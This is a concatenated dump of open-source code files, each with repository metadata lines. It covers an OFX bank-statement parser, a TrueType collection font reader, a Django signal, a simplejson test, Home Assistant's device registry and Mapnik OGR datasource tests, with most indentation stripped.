ofx_obj.security_list = cls_.parseSeclist(seclist_ofx)
else:
ofx_obj.security_list = None
acctinfors_ofx = ofx.find('acctinfors')
if acctinfors_ofx:
ofx_obj.accounts += cls_.parseAcctinfors(acctinfors_ofx, ofx)
fi_ofx = ofx.find('fi')
if fi_ofx:
for account in ofx_obj.accounts:
account.institution = cls_.parseOrg(fi_ofx)
if ofx_obj.accounts:
ofx_obj.account = ofx_obj.accounts[0]
return ofx_obj
@classmethod
def parseOfxDateTime(cls_, ofxDateTime):
        # ofxDateTime looks something like 20101106160000.00[-5:EST]
# for 6 Nov 2010 4pm UTC-5 aka EST
# Some places (e.g. Newfoundland) have non-integer offsets.
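        # e.g. parseOfxDateTime('20101106160000.00[-5:EST]')
        #      -> datetime.datetime(2010, 11, 6, 21, 0)   (normalized to UTC)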
res = re.search("\[(?P<tz>[-+]?\d+\.?\d*)\:\w*\]$", ofxDateTime)
if res:
tz = float(res.group('tz'))
else:
tz = 0
timeZoneOffset = datetime.timedelta(hours=tz)
res = re.search("^[0-9]*\.([0-9]{0,5})", ofxDateTime)
if res:
msec = datetime.timedelta(seconds=float("0." + res.group(1)))
else:
msec = datetime.timedelta(seconds=0)
try:
local_date = datetime.datetime.strptime(
ofxDateTime[:14], '%Y%m%d%H%M%S'
)
return local_date - timeZoneOffset + msec
except:
return datetime.datetime.strptime(
ofxDateTime[:8], '%Y%m%d') - timeZoneOffset + msec
@classmethod
def parseAcctinfors(cls_, acctinfors_ofx, ofx):
all_accounts = []
for i in acctinfors_ofx.findAll('acctinfo'):
accounts = []
if i.find('invacctinfo'):
accounts += cls_.parseInvstmtrs([i])
elif i.find('ccacctinfo'):
accounts += cls_.parseStmtrs([i], AccountType.CreditCard)
elif i.find('bankacctinfo'):
accounts += cls_.parseStmtrs([i], AccountType.Bank)
else:
continue
fi_ofx = ofx.find('fi')
if fi_ofx:
                for account in accounts:
account.institution = cls_.parseOrg(fi_ofx)
desc = i.find('desc')
if hasattr(desc, 'contents'):
for account in accounts:
account.desc = desc.contents[0].strip()
all_accounts += accounts
return all_accounts
@classmethod
def parseInvstmtrs(cls_, invstmtrs_list):
ret = []
for invstmtrs_ofx in invstmtrs_list:
account = InvestmentAccount()
acctid_tag = invstmtrs_ofx.find('acctid')
if (hasattr(acctid_tag, 'contents')):
try:
account.account_id = acctid_tag.contents[0].strip()
except IndexError:
account.warnings.append(
six.u("Empty acctid tag for %s") % invstmtrs_ofx)
if cls_.fail_fast:
raise
brokerid_tag = invstmtrs_ofx.find('brokerid')
if (hasattr(brokerid_tag, 'contents')):
try:
account.brokerid = brokerid_tag.contents[0].strip()
except IndexError:
account.warnings.append(
six.u("Empty brokerid tag for %s") % invstmtrs_ofx)
if cls_.fail_fast:
raise
account.type = AccountType.Investment
if (invstmtrs_ofx):
account.statement = cls_.parseInvestmentStatement(
invstmtrs_ofx)
ret.append(account)
return ret
@classmethod
def parseSeclist(cls_, seclist_ofx):
securityList = []
for secinfo_ofx in seclist_ofx.findAll('secinfo'):
uniqueid_tag = secinfo_ofx.find('uniqueid')
name_tag = secinfo_ofx.find('secname')
ticker_tag = secinfo_ofx.find('ticker')
memo_tag = secinfo_ofx.find('memo')
if uniqueid_tag and name_tag:
try:
ticker = ticker_tag.contents[0].strip()
except AttributeError:
# ticker can be empty
ticker = None
try:
memo = memo_tag.contents[0].strip()
except AttributeError:
# memo can be empty
memo = None
securityList.append(
Security(uniqueid_tag.contents[0].strip(),
name_tag.contents[0].strip(),
ticker,
memo))
return securityList
@classmethod
def parseInvestmentPosition(cls_, ofx):
position = Position()
tag = ofx.find('uniqueid')
if (hasattr(tag, 'contents')):
position.security = tag.contents[0].strip()
tag = ofx.find('units')
if (hasattr(tag, 'contents')):
position.units = decimal.Decimal(tag.contents[0].strip())
tag = ofx.find('unitprice')
if (hasattr(tag, 'contents')):
position.unit_price = decimal.Decimal(tag.contents[0].strip())
tag = ofx.find('dtpriceasof')
if (hasattr(tag, 'contents')):
try:
position.date = cls_.parseOfxDateTime(tag.contents[0].strip())
except ValueError:
raise
return position
@classmethod
def parseInvestmentTransaction(cls_, ofx):
transaction = InvestmentTransaction(ofx.name)
tag = ofx.find('fitid')
if (hasattr(tag, 'contents')):
transaction.id = tag.contents[0].strip()
tag = ofx.find('memo')
if (hasattr(tag, 'contents')):
transaction.memo = tag.contents[0].strip()
tag = ofx.find('dttrade')
if (hasattr(tag, 'contents')):
try:
transaction.tradeDate = cls_.parseOfxDateTime(
tag.contents[0].strip())
except ValueError:
raise
tag = ofx.find('dtsettle')
if (hasattr(tag, 'contents')):
try:
transaction.settleDate = cls_.parseOfxDateTime(
tag.contents[0].strip())
except ValueError:
raise
tag = ofx.find('uniqueid')
if (hasattr(tag, 'contents')):
transaction.security = tag.contents[0].strip()
tag = ofx.find('incometype')
if (hasattr(tag, 'contents')):
transaction.income_type = tag.contents[0].strip()
tag = ofx.find('units')
if (hasattr(tag, 'contents')):
transaction.units = decimal.Decimal(tag.contents[0].strip())
tag = ofx.find('unitprice')
if (hasattr(tag, 'contents')):
transaction.unit_price = decimal.Decimal(tag.contents[0].strip())
tag = ofx.find('commission')
if (hasattr(tag, 'contents')):
transaction.commission = decimal.Decimal(tag.contents[0].strip())
tag = ofx.find('fees')
if (hasattr(tag, 'contents')):
transaction.fees = decimal.Decimal(tag.contents[0].strip())
tag = ofx.find('total')
if (hasattr(tag, 'contents')):
transaction.total = decimal.Decimal(tag.contents[0].strip())
return transaction
@classmethod
def parseInvestmentStatement(cls_, invstmtrs_ofx):
statement = InvestmentStatement()
currency_tag = invstmtrs_ofx.find('curdef')
if hasattr(currency_tag, "contents"):
statement.currency = currency_tag.contents[0].strip().lower()
invtranlist_ofx = invstmtrs_ofx.find('invtranlist')
if (invtranlist_ofx is not None):
tag = invtranlist_ofx.find('dtstart')
if (hasattr(tag, 'contents')):
try:
statement.start_date = cls_.parseOfxDateTime(
tag.contents[0].strip())
except IndexError:
statement.warnings.append(six.u('Empty start date.'))
if cls_.fail_fast:
raise
except ValueError:
e = sys.exc_info()[1]
statement.warnings.append(six.u('Invalid start date: %s') % e)
if cls_.fail_fast:
raise
tag = invtranlist_ofx.find('dtend')
if (hasattr(tag, 'contents')):
try:
statement.end_date = cls_.parseOfxDateTime(
tag.contents[0].strip())
except IndexError:
statement.warnings.append(six.u('Empty end date.'))
except ValueError:
e = sys.exc_info()[1]
statement.warnings.append(six.u('Invalid end date: %s') % e)
if cls_.fail_fast:
raise
for transaction_type in ['posmf', 'posstock', 'posopt']:
try:
for investment_ofx in invstmtrs_ofx.findAll(transaction_type):
statement.positions.append(
cls_.parseInvestmentPosition(investment_ofx))
except (ValueError, IndexError, decimal.InvalidOperation,
TypeError):
e = sys.exc_info()[1]
if cls_.fail_fast:
raise
statement.discarded_entries.append(
{six.u('error'): six.u("Error parsing positions: ") + str(e),
six.u('content'): investment_ofx}
)
for transaction_type in ['buymf', 'sellmf', 'reinvest', 'buystock',
'sellstock', 'income', 'buyopt', 'sellopt']:
try:
for investment_ofx in invstmtrs_ofx.findAll(transaction_type):
statement.transactions.append(
cls_.parseInvestmentTransaction(investment_ofx))
except (ValueError, IndexError, decimal.InvalidOperation):
e = sys.exc_info()[1]
if cls_.fail_fast:
raise
statement.discarded_entries.append(
{six.u('error'): transaction_type + ": " + str(e),
six.u('content'): investment_ofx}
)
return statement
@classmethod
def parseOrg(cls_, fi_ofx):
institution = Institution()
org = fi_ofx.find('org')
if hasattr(org, 'contents'):
institution.organization = org.contents[0].strip()
fid = fi_ofx.find('fid')
if hasattr(fid, 'contents'):
institution.fid = fid.contents[0].strip()
return institution
@classmethod
def parseSonrs(cls_, sonrs):
items = [
'code',
'severity',
'dtserver',
'language',
'dtprofup',
'org',
'fid',
'intu.bid',
'message'
]
idict = {}
for i in items:
try:
idict[i] = sonrs.find(i).contents[0].strip()
except:
idict[i] = None
idict['code'] = int(idict['code'])
if idict['message'] is None:
idict['message'] = ''
return Signon(idict)
@classmethod
def parseStmtrs(cls_, stmtrs_list, accountType):
''' Parse the <STMTRS> tags and return a list of Accounts object. '''
ret = []
for stmtrs_ofx in stmtrs_list:
account = Account()
act_curdef = stmtrs_ofx.find('curdef')
if act_curdef:
account.curdef = act_curdef.contents[0].strip()
acctid_tag = stmtrs_ofx.find('acctid')
if hasattr(acctid_tag, 'contents'):
account.account_id = acctid_tag.contents[0].strip()
bankid_tag = stmtrs_ofx.find('bankid')
if hasattr(bankid_tag, 'contents'):
account.routing_number = bankid_tag.contents[0].strip()
branchid_tag = stmtrs_ofx.find('branchid')
if hasattr(branchid_tag, 'contents'):
account.branch_id = branchid_tag.contents[0].strip()
type_tag = stmtrs_ofx.find('accttype')
if hasattr(type_tag, 'contents'):
account.account_type = type_tag.contents[0].strip()
account.type = accountType
if stmtrs_ofx:
account.statement = cls_.parseStatement(stmtrs_ofx)
ret.append(account)
return ret
@classmethod
def parseBalance(cls_, statement, stmt_ofx, bal_tag_name, bal_attr, bal_date_attr, bal_type_string):
bal_tag = stmt_ofx.find(bal_tag_name)
if hasattr(bal_tag, "contents"):
balamt_tag = bal_tag.find('balamt')
dtasof_tag = bal_tag.find('dtasof')
if hasattr(balamt_tag, "contents"):
try:
setattr(statement, bal_attr, decimal.Decimal(
balamt_tag.contents[0].strip()))
except (IndexError, decimal.InvalidOperation):
ex = sys.exc_info()[1]
statement.warnings.append(
six.u("%s balance amount was empty for %s") % (bal_type_string, stmt_ofx))
if cls_.fail_fast:
raise OfxParserException("Empty %s balance" % bal_type_string)
if hasattr(dtasof_tag, "contents"):
try:
setattr(statement, bal_date_attr, cls_.parseOfxDateTime(
dtasof_tag.contents[0].strip()))
except IndexError:
statement.warnings.append(
six.u("%s balance date was empty for %s") % (bal_type_string, stmt_ofx))
if cls_.fail_fast:
raise
except ValueError:
statement.warnings.append(
six.u("%s balance date was not allowed for %s") % (bal_type_string, stmt_ofx))
if cls_.fail_fast:
raise
@classmethod
def parseStatement(cls_, stmt_ofx):
'''
Parse a statement in ofx-land and return a Statement object.
'''
statement = Statement()
dtstart_tag = stmt_ofx.find('dtstart')
if hasattr(dtstart_tag, "contents"):
try:
statement.start_date = cls_.parseOfxDateTime(
dtstart_tag.contents[0].strip())
except IndexError:
statement.warnings.append(
six.u("Statement start date was empty for %s") % stmt_ofx)
if cls_.fail_fast:
raise
except ValueError:
statement.warnings.append(
six.u("Statement start date was not allowed for %s") % stmt_ofx)
if cls_.fail_fast:
raise
dtend_tag = stmt_ofx.find('dtend')
if hasattr(dtend_tag, "contents"):
try:
statement.end_date = cls_.parseOfxDateTime(
dtend_tag.contents[0].strip())
except IndexError:
statement.warnings.append(
six.u("Statement start date was empty for %s") % stmt_ofx)
if cls_.fail_fast:
raise
except ValueError:
ve = sys.exc_info()[1]
msg = six.u("Statement start date was not formatted "
"correctly for %s")
statement.warnings.append(msg % stmt_ofx)
if cls_.fail_fast:
raise
except TypeError:
statement.warnings.append(
six.u("Statement start date was not allowed for %s") % stmt_ofx)
if cls_.fail_fast:
raise
currency_tag = stmt_ofx.find('curdef')
if hasattr(currency_tag, "contents"):
try:
statement.currency = currency_tag.contents[0].strip().lower()
except IndexError:
statement.warnings.append(
six.u("Currency definition was empty for %s") % stmt_ofx)
if cls_.fail_fast:
raise
cls_.parseBalance(statement, stmt_ofx, 'ledgerbal', 'balance', 'balance_date', 'ledger')
        cls_.parseBalance(statement, stmt_ofx, 'availbal', 'available_balance', 'available_balance_date', 'available')
for transaction_ofx in stmt_ofx.findAll('stmttrn'):
try:
statement.transactions.append(
cls_.parseTransaction(transaction_ofx))
except OfxParserException:
ofxError = sys.exc_info()[1]
statement.discarded_entries.append(
{'error': str(ofxError), 'content': transaction_ofx})
if cls_.fail_fast:
raise
return statement
@classmethod
def parseTransaction(cls_, txn_ofx):
'''
Parse a transaction in ofx-land and return a Transaction object.
'''
transaction = Transaction()
type_tag = txn_ofx.find('trntype')
if hasattr(type_tag, 'contents'):
try:
transaction.type = type_tag.contents[0].lower().strip()
except IndexError:
raise OfxParserException(six.u("Empty transaction type"))
except TypeError:
raise OfxParserException(
six.u("No Transaction type (a required field)"))
name_tag = txn_ofx.find('name')
if hasattr(name_tag, "contents"):
try:
transaction.payee = name_tag.contents[0].strip()
except IndexError:
raise OfxParserException(six.u("Empty transaction name"))
except TypeError:
raise OfxParserException(
six.u("No Transaction name (a required field)"))
memo_tag = txn_ofx.find('memo')
if hasattr(memo_tag, "contents"):
try:
transaction.memo = memo_tag.contents[0].strip()
except IndexError:
# Memo can be empty.
pass
except TypeError:
pass
amt_tag = txn_ofx.find('trnamt')
if hasattr(amt_tag, "contents"):
try:
transaction.amount = decimal.Decimal(
amt_tag.contents[0].strip())
except IndexError:
raise OfxParserException("Invalid Transaction Date")
except decimal.InvalidOperation:
raise OfxParserException(
six.u("Invalid Transaction Amount: '%s'") % amt_tag.contents[0])
except TypeError:
raise OfxParserException(
six.u("No Transaction Amount (a required field)"))
else:
raise OfxParserException(
six.u("Missing Transaction Amount (a required field)"))
date_tag = txn_ofx.find('dtposted')
if hasattr(date_tag, "contents"):
try:
transaction.date = cls_.parseOfxDateTime(
date_tag.contents[0].strip())
except IndexError:
raise OfxParserException("Invalid Transaction Date")
except ValueError:
ve = sys.exc_info()[1]
raise OfxParserException(str(ve))
except TypeError:
raise OfxParserException(
six.u("No Transaction Date (a required field)"))
else:
raise OfxParserException(
six.u("Missing Transaction Date (a required field)"))
id_tag = txn_ofx.find('fitid')
if hasattr(id_tag, "contents"):
try:
transaction.id = id_tag.contents[0].strip()
except IndexError:
raise OfxParserException(six.u("Empty FIT id (a required field)"))
except TypeError:
raise OfxParserException(six.u("No FIT id (a required field)"))
else:
raise OfxParserException(six.u("Missing FIT id (a required field)"))
sic_tag = txn_ofx.find('sic')
if hasattr(sic_tag, 'contents'):
try:
transaction.sic = sic_tag.contents[0].strip()
except IndexError:
raise OfxParserException(six.u("Empty transaction Standard Industry Code (SIC)"))
if transaction.sic is not None and transaction.sic in mcc.codes:
try:
transaction.mcc = mcc.codes.get(transaction.sic, '').get('combined description')
except IndexError:
raise OfxParserException(six.u("Empty transaction Merchant Category Code (MCC)"))
except AttributeError:
                if cls_.fail_fast:
raise
checknum_tag = txn_ofx.find('checknum')
if hasattr(checknum_tag, 'contents'):
try:
transaction.checknum = checknum_tag.contents[0].strip()
except IndexError:
raise OfxParserException(six.u("Empty Check (or other reference) number"))
return transaction
|
tp7/assfc
|
refs/heads/master
|
font_loader/ttc_parser.py
|
1
|
from collections import namedtuple
import logging
import struct
from font_loader.ttf_parser import TTFFont
TTCHeader = namedtuple('TTCHeader', ['tag','version','num_fonts'])
class TTCFont(object):
def __init__(self, path):
self.__info = []
self.parse(path)
def parse(self, path):
with open(path,'rb') as file:
data = struct.unpack('>4sIL', file.read(12))
ttc_header = TTCHeader(data[0].decode('ascii'),data[1],data[2])
if ttc_header.tag != 'ttcf':
return
ttf_offsets = []
for i in range(ttc_header.num_fonts):
ttf_offsets.append(struct.unpack('>I',file.read(4))[0])
for offset in ttf_offsets:
ttf_font = TTFFont(path, offset)
self.__info.append(ttf_font.get_info())
def get_infos(self):
return self.__info
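# Usage sketch (path illustrative):
#   infos = TTCFont('/usr/share/fonts/truetype/msgothic.ttc').get_infos()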
|
moreati/django-userena
|
refs/heads/master
|
userena/contrib/umessages/signals.py
|
23
|
from django.dispatch import Signal
email_sent = Signal(providing_args=["msg"])
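# Receivers get the sent message via the `msg` kwarg, e.g. (handler illustrative):
#   def log_sent(sender, msg, **kwargs): ...
#   email_sent.connect(log_sent)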
|
TinajaLabs/makerfaire2015
|
refs/heads/master
|
SensorGateway/home/tinaja/downloads/simplejson-2.6.1/simplejson/tests/test_speedups.py
|
129
|
from unittest import TestCase
from simplejson import encoder, scanner
def has_speedups():
return encoder.c_make_encoder is not None
class TestDecode(TestCase):
def test_make_scanner(self):
if not has_speedups():
return
self.assertRaises(AttributeError, scanner.c_make_scanner, 1)
def test_make_encoder(self):
if not has_speedups():
return
self.assertRaises(TypeError, encoder.c_make_encoder,
None,
"\xCD\x7D\x3D\x4E\x12\x4C\xF9\x79\xD7\x52\xBA\x82\xF2\x27\x4A\x7D\xA0\xCA\x75",
None)
|
molobrakos/home-assistant
|
refs/heads/master
|
homeassistant/helpers/device_registry.py
|
4
|
"""Provide a way to connect entities belonging to one device."""
import logging
import uuid
from asyncio import Event
from collections import OrderedDict
from typing import List, Optional, cast
import attr
from homeassistant.core import callback
from homeassistant.loader import bind_hass
from .typing import HomeAssistantType
_LOGGER = logging.getLogger(__name__)
_UNDEF = object()
DATA_REGISTRY = 'device_registry'
STORAGE_KEY = 'core.device_registry'
STORAGE_VERSION = 1
SAVE_DELAY = 10
CONNECTION_NETWORK_MAC = 'mac'
CONNECTION_UPNP = 'upnp'
CONNECTION_ZIGBEE = 'zigbee'
@attr.s(slots=True, frozen=True)
class DeviceEntry:
"""Device Registry Entry."""
config_entries = attr.ib(type=set, converter=set,
default=attr.Factory(set))
connections = attr.ib(type=set, converter=set, default=attr.Factory(set))
identifiers = attr.ib(type=set, converter=set, default=attr.Factory(set))
manufacturer = attr.ib(type=str, default=None)
model = attr.ib(type=str, default=None)
name = attr.ib(type=str, default=None)
sw_version = attr.ib(type=str, default=None)
hub_device_id = attr.ib(type=str, default=None)
area_id = attr.ib(type=str, default=None)
name_by_user = attr.ib(type=str, default=None)
id = attr.ib(type=str, default=attr.Factory(lambda: uuid.uuid4().hex))
def format_mac(mac):
"""Format the mac address string for entry into dev reg."""
to_test = mac
if len(to_test) == 17 and to_test.count(':') == 5:
return to_test.lower()
if len(to_test) == 17 and to_test.count('-') == 5:
to_test = to_test.replace('-', '')
elif len(to_test) == 14 and to_test.count('.') == 2:
to_test = to_test.replace('.', '')
if len(to_test) == 12:
# no : included
return ':'.join(to_test.lower()[i:i + 2] for i in range(0, 12, 2))
# Not sure how formatted, return original
return mac
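# e.g. format_mac('AA-BB-CC-DD-EE-FF') -> 'aa:bb:cc:dd:ee:ff'
#      format_mac('aabb.ccdd.eeff')    -> 'aa:bb:cc:dd:ee:ff'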
class DeviceRegistry:
"""Class to hold a registry of devices."""
def __init__(self, hass):
"""Initialize the device registry."""
self.hass = hass
self.devices = None
self._store = hass.helpers.storage.Store(STORAGE_VERSION, STORAGE_KEY)
@callback
def async_get(self, device_id: str) -> Optional[DeviceEntry]:
"""Get device."""
return self.devices.get(device_id)
@callback
def async_get_device(self, identifiers: set, connections: set):
"""Check if device is registered."""
for device in self.devices.values():
if any(iden in device.identifiers for iden in identifiers) or \
any(conn in device.connections for conn in connections):
return device
return None
@callback
def async_get_or_create(self, *, config_entry_id, connections=None,
identifiers=None, manufacturer=_UNDEF,
model=_UNDEF, name=_UNDEF, sw_version=_UNDEF,
via_hub=None):
"""Get device. Create if it doesn't exist."""
if not identifiers and not connections:
return None
if identifiers is None:
identifiers = set()
if connections is None:
connections = set()
connections = {
(key, format_mac(value)) if key == CONNECTION_NETWORK_MAC
else (key, value)
for key, value in connections
}
device = self.async_get_device(identifiers, connections)
if device is None:
device = DeviceEntry()
self.devices[device.id] = device
if via_hub is not None:
hub_device = self.async_get_device({via_hub}, set())
hub_device_id = hub_device.id if hub_device else _UNDEF
else:
hub_device_id = _UNDEF
return self._async_update_device(
device.id,
add_config_entry_id=config_entry_id,
hub_device_id=hub_device_id,
merge_connections=connections or _UNDEF,
merge_identifiers=identifiers or _UNDEF,
manufacturer=manufacturer,
model=model,
name=name,
sw_version=sw_version
)
@callback
def async_update_device(
self, device_id, *, area_id=_UNDEF, name_by_user=_UNDEF):
"""Update properties of a device."""
return self._async_update_device(
device_id, area_id=area_id, name_by_user=name_by_user)
@callback
def _async_update_device(self, device_id, *, add_config_entry_id=_UNDEF,
remove_config_entry_id=_UNDEF,
merge_connections=_UNDEF,
merge_identifiers=_UNDEF,
manufacturer=_UNDEF,
model=_UNDEF,
name=_UNDEF,
sw_version=_UNDEF,
hub_device_id=_UNDEF,
area_id=_UNDEF,
name_by_user=_UNDEF):
"""Update device attributes."""
old = self.devices[device_id]
changes = {}
config_entries = old.config_entries
if (add_config_entry_id is not _UNDEF and
add_config_entry_id not in old.config_entries):
config_entries = old.config_entries | {add_config_entry_id}
if (remove_config_entry_id is not _UNDEF and
remove_config_entry_id in config_entries):
config_entries = config_entries - {remove_config_entry_id}
if config_entries is not old.config_entries:
changes['config_entries'] = config_entries
for attr_name, value in (
('connections', merge_connections),
('identifiers', merge_identifiers),
):
old_value = getattr(old, attr_name)
# If not undefined, check if `value` contains new items.
if value is not _UNDEF and not value.issubset(old_value):
changes[attr_name] = old_value | value
for attr_name, value in (
('manufacturer', manufacturer),
('model', model),
('name', name),
('sw_version', sw_version),
('hub_device_id', hub_device_id),
):
if value is not _UNDEF and value != getattr(old, attr_name):
changes[attr_name] = value
if (area_id is not _UNDEF and area_id != old.area_id):
changes['area_id'] = area_id
if (name_by_user is not _UNDEF and
name_by_user != old.name_by_user):
changes['name_by_user'] = name_by_user
if not changes:
return old
new = self.devices[device_id] = attr.evolve(old, **changes)
self.async_schedule_save()
return new
async def async_load(self):
"""Load the device registry."""
data = await self._store.async_load()
devices = OrderedDict()
if data is not None:
for device in data['devices']:
devices[device['id']] = DeviceEntry(
config_entries=set(device['config_entries']),
connections={tuple(conn) for conn
in device['connections']},
identifiers={tuple(iden) for iden
in device['identifiers']},
manufacturer=device['manufacturer'],
model=device['model'],
name=device['name'],
sw_version=device['sw_version'],
id=device['id'],
# Introduced in 0.79
hub_device_id=device.get('hub_device_id'),
# Introduced in 0.87
area_id=device.get('area_id'),
name_by_user=device.get('name_by_user')
)
self.devices = devices
@callback
def async_schedule_save(self):
"""Schedule saving the device registry."""
self._store.async_delay_save(self._data_to_save, SAVE_DELAY)
@callback
def _data_to_save(self):
"""Return data of device registry to store in a file."""
data = {}
data['devices'] = [
{
'config_entries': list(entry.config_entries),
'connections': list(entry.connections),
'identifiers': list(entry.identifiers),
'manufacturer': entry.manufacturer,
'model': entry.model,
'name': entry.name,
'sw_version': entry.sw_version,
'id': entry.id,
'hub_device_id': entry.hub_device_id,
'area_id': entry.area_id,
'name_by_user': entry.name_by_user
} for entry in self.devices.values()
]
return data
@callback
def async_clear_config_entry(self, config_entry_id):
"""Clear config entry from registry entries."""
for dev_id, device in self.devices.items():
if config_entry_id in device.config_entries:
self._async_update_device(
dev_id, remove_config_entry_id=config_entry_id)
@callback
def async_clear_area_id(self, area_id: str) -> None:
"""Clear area id from registry entries."""
for dev_id, device in self.devices.items():
if area_id == device.area_id:
self._async_update_device(dev_id, area_id=None)
@bind_hass
async def async_get_registry(hass: HomeAssistantType) -> DeviceRegistry:
"""Return device registry instance."""
reg_or_evt = hass.data.get(DATA_REGISTRY)
if not reg_or_evt:
evt = hass.data[DATA_REGISTRY] = Event()
reg = DeviceRegistry(hass)
await reg.async_load()
hass.data[DATA_REGISTRY] = reg
evt.set()
return reg
if isinstance(reg_or_evt, Event):
evt = reg_or_evt
await evt.wait()
return cast(DeviceRegistry, hass.data.get(DATA_REGISTRY))
return cast(DeviceRegistry, reg_or_evt)
@callback
def async_entries_for_area(registry: DeviceRegistry, area_id: str) \
-> List[DeviceEntry]:
"""Return entries that match an area."""
return [device for device in registry.devices.values()
if device.area_id == area_id]
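# A hedged usage sketch from an integration's setup (domain, MAC and serial
# below are illustrative values, not a real device):
#
#     async def async_setup_entry(hass, entry):
#         registry = await async_get_registry(hass)
#         registry.async_get_or_create(
#             config_entry_id=entry.entry_id,
#             connections={(CONNECTION_NETWORK_MAC, 'AA:BB:CC:DD:EE:FF')},
#             identifiers={('example_domain', 'serial-0001')},
#             manufacturer='Example Corp',
#             model='Widget 1',
#         )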
|
yohanboniface/python-mapnik
|
refs/heads/master
|
test/python_tests/ogr_test.py
|
3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from nose.tools import assert_almost_equal, eq_, raises
import mapnik
from .utilities import execution_path, run_all
try:
import json
except ImportError:
import simplejson as json
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
if 'ogr' in mapnik.DatasourceCache.plugin_names():
# Shapefile initialization
def test_shapefile_init():
ds = mapnik.Ogr(file='../data/shp/boundaries.shp', layer_by_index=0)
e = ds.envelope()
assert_almost_equal(e.minx, -11121.6896651, places=7)
assert_almost_equal(e.miny, -724724.216526, places=6)
assert_almost_equal(e.maxx, 2463000.67866, places=5)
assert_almost_equal(e.maxy, 1649661.267, places=3)
meta = ds.describe()
eq_(meta['geometry_type'], mapnik.DataGeometryType.Polygon)
eq_('+proj=lcc' in meta['proj4'], True)
# Shapefile properties
def test_shapefile_properties():
ds = mapnik.Ogr(file='../data/shp/boundaries.shp', layer_by_index=0)
f = ds.features_at_point(ds.envelope().center(), 0.001).features[0]
eq_(ds.geometry_type(), mapnik.DataGeometryType.Polygon)
eq_(f['CGNS_FID'], u'6f733341ba2011d892e2080020a0f4c9')
eq_(f['COUNTRY'], u'CAN')
eq_(f['F_CODE'], u'FA001')
eq_(f['NAME_EN'], u'Quebec')
eq_(f['Shape_Area'], 1512185733150.0)
eq_(f['Shape_Leng'], 19218883.724300001)
meta = ds.describe()
eq_(meta['geometry_type'], mapnik.DataGeometryType.Polygon)
# NOTE: encoding is latin1 but gdal >= 1.9 should now expose utf8 encoded features
# See SHAPE_ENCODING for overriding: http://gdal.org/ogr/drv_shapefile.html
# Failure for the NOM_FR field is expected for older gdal
#eq_(f['NOM_FR'], u'Qu\xe9bec')
#eq_(f['NOM_FR'], u'Québec')
@raises(RuntimeError)
def test_that_nonexistant_query_field_throws(**kwargs):
ds = mapnik.Ogr(file='../data/shp/world_merc.shp', layer_by_index=0)
eq_(len(ds.fields()), 11)
eq_(ds.fields(), ['FIPS', 'ISO2', 'ISO3', 'UN', 'NAME',
'AREA', 'POP2005', 'REGION', 'SUBREGION', 'LON', 'LAT'])
eq_(ds.field_types(),
['str',
'str',
'str',
'int',
'str',
'int',
'int',
'int',
'int',
'float',
'float'])
query = mapnik.Query(ds.envelope())
for fld in ds.fields():
query.add_property_name(fld)
# also add an invalid one, triggering throw
query.add_property_name('bogus')
ds.features(query)
# disabled because OGR prints an annoying error: ERROR 1: Invalid Point object. Missing 'coordinates' member.
# def test_handling_of_null_features():
# ds = mapnik.Ogr(file='../data/json/null_feature.geojson',layer_by_index=0)
# fs = ds.all_features()
# eq_(len(fs),1)
# OGR plugin extent parameter
def test_ogr_extent_parameter():
ds = mapnik.Ogr(
file='../data/shp/world_merc.shp',
layer_by_index=0,
extent='-1,-1,1,1')
e = ds.envelope()
eq_(e.minx, -1)
eq_(e.miny, -1)
eq_(e.maxx, 1)
eq_(e.maxy, 1)
meta = ds.describe()
eq_(meta['geometry_type'], mapnik.DataGeometryType.Polygon)
eq_('+proj=merc' in meta['proj4'], True)
def test_ogr_reading_gpx_waypoint():
ds = mapnik.Ogr(file='../data/gpx/empty.gpx', layer='waypoints')
e = ds.envelope()
eq_(e.minx, -122)
eq_(e.miny, 48)
eq_(e.maxx, -122)
eq_(e.maxy, 48)
meta = ds.describe()
eq_(meta['geometry_type'], mapnik.DataGeometryType.Point)
eq_('+proj=longlat' in meta['proj4'], True)
def test_ogr_empty_data_should_not_throw():
default_logging_severity = mapnik.logger.get_severity()
mapnik.logger.set_severity(getattr(mapnik.severity_type, "None"))
# use logger to silence expected warnings
for layer in ['routes', 'tracks', 'route_points', 'track_points']:
ds = mapnik.Ogr(file='../data/gpx/empty.gpx', layer=layer)
e = ds.envelope()
eq_(e.minx, 0)
eq_(e.miny, 0)
eq_(e.maxx, 0)
eq_(e.maxy, 0)
mapnik.logger.set_severity(default_logging_severity)
meta = ds.describe()
eq_(meta['geometry_type'], mapnik.DataGeometryType.Point)
eq_('+proj=longlat' in meta['proj4'], True)
# disabled because OGR prints an annoying error: ERROR 1: Invalid Point object. Missing 'coordinates' member.
# def test_handling_of_null_features():
# ds = mapnik.Ogr(file='../data/json/null_feature.geojson',layer_by_index=0)
# fs = ds.all_features()
# eq_(len(fs),1)
def test_geometry_type():
ds = mapnik.Ogr(file='../data/csv/wkt.csv', layer_by_index=0)
e = ds.envelope()
assert_almost_equal(e.minx, 1.0, places=1)
assert_almost_equal(e.miny, 1.0, places=1)
assert_almost_equal(e.maxx, 45.0, places=1)
assert_almost_equal(e.maxy, 45.0, places=1)
meta = ds.describe()
eq_(meta['geometry_type'], mapnik.DataGeometryType.Point)
#eq_('+proj=longlat' in meta['proj4'],True)
fs = ds.featureset()
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'Point',
u'coordinates': [30,
10]},
u'type': u'Feature',
u'id': 2,
u'properties': {u'type': u'point',
u'WKT': u' POINT (30 10)'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'LineString',
u'coordinates': [[30,
10],
[10,
30],
[40,
40]]},
u'type': u'Feature',
u'id': 3,
u'properties': {u'type': u'linestring',
u'WKT': u' LINESTRING (30 10, 10 30, 40 40)'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'Polygon',
u'coordinates': [[[30,
10],
[40,
40],
[20,
40],
[10,
20],
[30,
10]]]},
u'type': u'Feature',
u'id': 4,
u'properties': {u'type': u'polygon',
u'WKT': u' POLYGON ((30 10, 10 20, 20 40, 40 40, 30 10))'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(
actual, {
u'geometry': {
u'type': u'Polygon', u'coordinates': [
[
[
35, 10], [
45, 45], [
15, 40], [
10, 20], [
35, 10]], [
[
20, 30], [
35, 35], [
30, 20], [
20, 30]]]}, u'type': u'Feature', u'id': 5, u'properties': {
